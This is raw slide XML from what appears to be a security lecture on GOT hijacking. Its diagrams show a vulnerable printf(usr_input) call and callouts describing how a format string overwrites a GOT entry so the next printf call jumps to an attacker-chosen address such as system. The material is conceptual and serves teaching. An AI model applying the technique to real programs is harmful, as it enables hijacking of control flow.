            <a:schemeClr val="accent6">
              <a:lumMod val="75000"/>
              <a:alpha val="2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671520" y="3758776"/>
            <a:ext cx="2763729" cy="1015180"/>
            <a:chOff x="671520" y="3758776"/>
            <a:chExt cx="2763729" cy="1015180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangular Callout 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="671521" y="3758776"/>
              <a:ext cx="2763728" cy="1015180"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 21195"/>
                <a:gd name="adj2" fmla="val -178426"/>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 name="Rectangular Callout 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="671520" y="3758776"/>
              <a:ext cx="2763729" cy="1015180"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 132576"/>
                <a:gd name="adj2" fmla="val -46678"/>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smtClean="0"/>
                <a:t>Use the format string to overwrite a GOT entry</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5435710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990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GOT Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1819783"/>
            <a:ext cx="2978050" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>usr_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(“world\n”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4029126" y="1819783"/>
            <a:ext cx="4423279" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> GOT[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4029126" y="2835446"/>
            <a:ext cx="4423279" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>GOT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>any_attacker_addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2111771"/>
            <a:ext cx="2608440" cy="364981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="75000"/>
              <a:alpha val="2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457200" y="5469717"/>
            <a:ext cx="4423279" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>dynamic_printf_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5036743"/>
            <a:ext cx="4423279" cy="432974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="50000"/>
              <a:alpha val="61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LIBC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Hexagon 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5883108" y="4394377"/>
            <a:ext cx="2029161" cy="1401529"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst>
              <a:gd name="adj" fmla="val 14584"/>
              <a:gd name="vf" fmla="val 115470"/>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Linker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430560" y="3363561"/>
            <a:ext cx="2481709" cy="364981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="75000"/>
              <a:alpha val="2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671520" y="3758776"/>
            <a:ext cx="2763729" cy="1015180"/>
            <a:chOff x="671520" y="3758776"/>
            <a:chExt cx="2763729" cy="1015180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangular Callout 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="671521" y="3758776"/>
              <a:ext cx="2763728" cy="1015180"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 21195"/>
                <a:gd name="adj2" fmla="val -178426"/>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 name="Rectangular Callout 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="671520" y="3758776"/>
              <a:ext cx="2763729" cy="1015180"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 132576"/>
                <a:gd name="adj2" fmla="val -46678"/>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smtClean="0"/>
                <a:t>Use the format string to overwrite a GOT entry</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3241152991"/>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990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GOT Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1819783"/>
            <a:ext cx="2978050" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>usr_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(“world\n”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4029126" y="1819783"/>
            <a:ext cx="4423279" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> GOT[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4029126" y="2835446"/>
            <a:ext cx="4423279" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>GOT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>any_attacker_addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2652955"/>
            <a:ext cx="2608440" cy="364981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="75000"/>
              <a:alpha val="2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457200" y="5469717"/>
            <a:ext cx="4423279" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>dynamic_printf_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5036743"/>
            <a:ext cx="4423279" cy="432974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="50000"/>
              <a:alpha val="61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LIBC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Hexagon 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5883108" y="4394377"/>
            <a:ext cx="2029161" cy="1401529"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst>
              <a:gd name="adj" fmla="val 14584"/>
              <a:gd name="vf" fmla="val 115470"/>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Linker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430560" y="3363561"/>
            <a:ext cx="2481709" cy="364981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="75000"/>
              <a:alpha val="2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671520" y="3758776"/>
            <a:ext cx="3883145" cy="1015180"/>
            <a:chOff x="671520" y="3758776"/>
            <a:chExt cx="3883145" cy="1015180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangular Callout 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="671521" y="3758776"/>
              <a:ext cx="3883144" cy="1015180"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -7576"/>
                <a:gd name="adj2" fmla="val -120902"/>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 name="Rectangular Callout 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="671520" y="3758776"/>
              <a:ext cx="3883145" cy="1015180"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 88967"/>
                <a:gd name="adj2" fmla="val -49554"/>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smtClean="0"/>
                <a:t>The next invocation transfers control wherever the attacker wants (e.g., system, pop-ret, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t>)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
